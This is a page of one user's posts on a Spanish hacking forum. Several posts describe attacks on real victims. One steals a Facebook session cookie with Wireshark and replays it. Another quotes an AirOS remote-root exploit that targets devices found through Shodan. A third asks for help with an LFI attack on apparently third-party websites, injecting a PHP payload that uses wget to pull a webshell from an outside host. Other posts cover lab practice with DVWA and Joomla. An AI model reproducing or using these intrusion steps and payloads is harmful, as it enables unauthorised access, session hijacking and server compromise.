elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15
21  Foros Generales / Noticias / Re: LulzSec: hemos resucitado en: 22 Marzo 2012, 21:54 pm
con que nos sorprenderán esta vez???
 :huh: :huh:
22  Seguridad Informática / Hacking / robo de cookies con wireshark y sesion de facebook en: 12 Marzo 2012, 13:50 pm
En esta ocasión, uso la herramienta wireshark para robar la cookie de una sesión facebook, para poder hacer esto, tenemos que estar en la misma red que nuestra victima, ademas, una vez robada la cookie, tenemos que usara, no sirve para usar mas tarde.

Uso la herramienta live HTTP header para modificar la cookie, quiero decir: que cambio la que mande mi navegador por la que uso la victima.



23  Programación / Scripting / HTTPBasicAuthHandler() me tiene loco en: 3 Enero 2012, 19:42 pm
Estoy aprendiendo Python, y necesito ayuda. Tengo este código:

Código:
#!/usr/bin/python

import urllib2, urllib, os
 
 
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin',   passwd='123456')

opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)

respuesta = urllib2.urlopen('http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/')

os.system("firefox http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php")

siguiendo esta guía: 20.6. urllib2 ? extensible library for opening URLs — Python v2.7.2 documentation

Pero algo estoy haciendo mal, porque no obtengo los resultados deseados.

El objetivo de este programa es pasar los datos user y pass de la autentificacion de administrador joomla, que tengo en mi pequeño laboratorio de casa, y que esta me abra una nueva ventana con la pantalla del panel de control, osea, con el admin ya identificado.

para esta parte uso:

Código:
import os
 
os.system("firefox www.google.com")

como cambio google por la url que necesito

http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php

este es el fallo que me devuelve:

Citar
ruben@coyote:~/UBNT$ ./boa.py
  File "./boa.py", line 7
    auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin',   passwd='123456')
                                                          ^
SyntaxError: invalid syntax

NOTA: la "^" en el mensaje original, esta situada debajo de la "i" de "uri="
24  Foros Generales / Noticias / 0day en AirOS (Acceso como Root) en: 28 Diciembre 2011, 19:58 pm
0day en AirOS (Acceso como Root)

Citar
AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).

trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt

http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf

fuente:http://www.blackploit.com/
25  Seguridad Informática / Hacking / Re: sqli en dvwa en: 26 Diciembre 2011, 17:14 pm
Citar
La aplicación recibe un identificador numérico y devuelve qué usuario dispone de ese identificador. Por ejemplo, si introducimos un '1' como "user id" la aplicación nos devolverá 'admin'. La aplicación realiza la siguiente consulta SQL sobre la base de datos, "SELECT first_name, last_name FROM users WHERE user_id = '$id'", recibiendo como parámetro el user_id. En el caso de no realizar un buen tratamiento del identificador un atacante podrá realizar una inyección SQL.

fuente:http://www.pentester.es/2010/03/sqlmap-inyeccion-sql-automatica.html
26  Seguridad Informática / Hacking / sqli en dvwa en: 26 Diciembre 2011, 01:40 am
dvwa = http://www.dvwa.co.uk/

una aplicación vulnerable, con todo tipo de fallas para que juguemos



aquí muestro como hacer sqli con sqlmap usando la opción cookie
27  Seguridad Informática / Nivel Web / Re: ayuda con LFI en: 13 Diciembre 2011, 21:44 pm
Esto es lo que conseguido de momento


28  Seguridad Informática / Nivel Web / Re: Relato de una intrusión - Un miserable LFI en: 12 Diciembre 2011, 19:23 pm
Citar
en ese caso sigue intentando por otro medio.

no sse cuales son los otros medios, puedes ayudarme, dame una explicacion o una direccion para poder aprender esas tecnicas.

gracias
29  Seguridad Informática / Nivel Web / ayuda con LFI en: 11 Diciembre 2011, 23:27 pm
Tengo un par de web que son vulnerables a LFI. Puedo ver varios archivos como:

Citar

pero no puede ver

etc/self/environ

porque?

En otra web que si puedo verlo:

Citar
DOCUMENT_ROOT=/home/*********/public_html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=TIS-620,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.***************.com.pt�HTTP_KEEP_ALIVE=115�HTTP_USER_AGENT=AQUI DEBE IR LA SHELL�PATH=/bin:/usr/bin�QUERY_STRING=content=*******/*******.php/../../../../../../proc/self/environ�REDIRECT_STATUS=200�REMOTE_ADDR=***.***.***.***�REMOTE_PORT=47433�REQUEST_METHOD=GET�REQUEST_URI=/*****.php?**********=***/*****.php/../../../../../../proc/self/environ�SCRIPT_FILENAME=/home/******/public_html/index.php�SCRIPT_NAME=/index.php�SERVER_ADDR=***.***.***.***�SERVER_ADMIN=webmaster@**********.com.**�SERVER_NAME=www.***********.com.**�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=�
SERVER_SOFTWARE=Apache�UNIQUE_ID=**************_****�

cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell

Código:
<?system ('wget http://rutadeunawebshell.com/shell.txt -o shell.php');?>

esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.

Citar
Not Found

The requested URL /shell.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)
30  Seguridad Informática / Nivel Web / Re: Relato de una intrusión - Un miserable LFI en: 11 Diciembre 2011, 19:44 pm
  :-[
pido disculpas, leer dos veces antes de contestar.

 ;)
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines